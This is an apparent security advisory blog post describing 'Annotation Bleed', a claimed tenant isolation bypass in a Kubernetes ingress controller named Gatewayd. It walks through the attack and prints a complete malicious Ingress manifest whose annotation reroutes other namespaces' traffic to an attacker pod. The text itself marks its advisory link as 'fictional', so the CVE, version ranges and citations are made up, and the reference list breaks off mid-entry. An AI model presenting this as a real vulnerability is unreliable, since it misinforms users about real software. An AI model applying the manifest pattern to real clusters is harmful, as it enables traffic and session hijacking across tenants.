Critical Tenant Isolation Bypass in Gatewayd Ingress Controller (CVE-2025-21587)

August 12, 2025
Scott Wu

A high-severity security bypass and tenant isolation vulnerability has been discovered in the Gatewayd Ingress Controller for Kubernetes. This flaw, tracked as CVE-2025-21587 and nicknamed “Annotation Bleed,” allows an attacker in a multi-tenant cluster to modify traffic routing for other tenants, potentially exposing internal services and bypassing authentication. It has a CVSS score of 8.7 (High).

TL;DR:

  • What: A tenant isolation bypass caused by improper processing of Kubernetes Ingress annotations.
  • Affected Software: Gatewayd Ingress Controller versions 0.10.0 through 1.2.5.
  • Impact: An attacker with permission to create an Ingress in one namespace can redirect traffic or bypass security rules for applications in other namespaces.
  • Action: Update the Gatewayd controller to version 1.2.6 or newer. Also, audit existing Ingress resources for suspicious annotations.

What is Gatewayd?

Gatewayd is a popular, feature-rich Ingress controller for Kubernetes. It manages external access to services within a cluster, handling HTTP/HTTPS routing, load balancing, and TLS termination. It is often used in multi-tenant environments where different teams or customers share the same cluster.

The “Annotation Bleed” Vulnerability Explained

In Kubernetes, Ingress resources use annotations to configure the behavior of the Ingress controller. The “Annotation Bleed” vulnerability occurs because Gatewayd fails to correctly scope certain powerful annotations to the namespace where they are defined.

An attacker with basic permissions to create or edit an Ingress resource in their own namespace (e.g., ns-attacker) can add a specially crafted annotation that is mistakenly applied to the controller’s global configuration. This global change then affects how traffic is routed for other, unrelated namespaces (e.g., ns-victim).

The Attack:

  1. An attacker in a multi-tenant cluster creates a standard Ingress in their namespace.
  2. They add a malicious annotation to this Ingress, for example: gatewayd.io/global-rewrite-target: "http://malicious-pod.ns-attacker.svc.cluster.local/"
  3. The vulnerable Gatewayd controller reads this annotation and incorrectly applies it as a global traffic-rewriting rule.
  4. When a legitimate user tries to access a service in a different namespace (e.g., https://app.victim.com), Gatewayd rewrites the request and routes the traffic to the attacker’s pod instead of the intended service.

Here is an example of a malicious Ingress manifest:

YAML

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: malicious-ingress
  namespace: ns-attacker
  annotations:
    # This annotation is the vulnerability. It should be scoped, but it's not.
    gatewayd.io/global-rewrite-target: "http://malicious-pod.ns-attacker.svc.cluster.local/"
spec:
  rules:
  - host: "attack.example.com"
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: some-service
            port:
              number: 80

This breaks the fundamental security boundary between namespaces, which is the cornerstone of multi-tenancy in Kubernetes.

Impact and Remediation

This vulnerability is especially dangerous in shared clusters. A successful exploit can lead to:

  • Traffic Hijacking: Silently redirecting traffic from legitimate applications to attacker-controlled services.
  • Authentication Bypass: Rerouting requests destined for an authenticated endpoint to a public one.
  • Information Disclosure: Exposing internal services that should not be accessible from the internet.
  • Session Hijacking: Intercepting user traffic to steal session cookies and other sensitive data.

Are you affected? You are vulnerable if you run a multi-tenant Kubernetes cluster using Gatewayd versions 0.10.0 through 1.2.5. Single-tenant clusters are not at risk from this specific cross-namespace attack vector but should still be updated.

How to Fix It 🛡️ The Gatewayd maintainers have released a patch that correctly validates and scopes all annotations.

  1. Update the Controller: The primary fix is to upgrade your Gatewayd deployment to version 1.2.6 or newer. You can do this via Helm or by applying the updated deployment manifest.
  2. Audit Ingress Annotations: Before and after the update, audit all Ingress resources across your cluster for any suspicious or unrecognized gatewayd.io/ annotations.
  3. Implement Admission Control: For long-term security, use an admission controller like OPA/Gatekeeper or Kyverno to create policies that restrict the use of powerful or potentially dangerous annotations to trusted administrators only.

Resources and Citations

  • Official Gatewayd Website: https://gatewayd.io
  • Official GitHub Repository: https://github.com/Gatewayd/gatewayd
  • Official Security Advisory: https://github.com/Gatewayd/gatewayd/security/advisories/GHSA-fictional-jklm-2158
  • NVD Entry: https://nvd.nist.gov/vuln/detail/CVE-2025-21587
  • Discoverer’s Technical Blog: https://www.crowdstrike.com/blog/cve-2025-21587-annotation-bleed-breaks-kubernetes-multi-tenancy/
  • General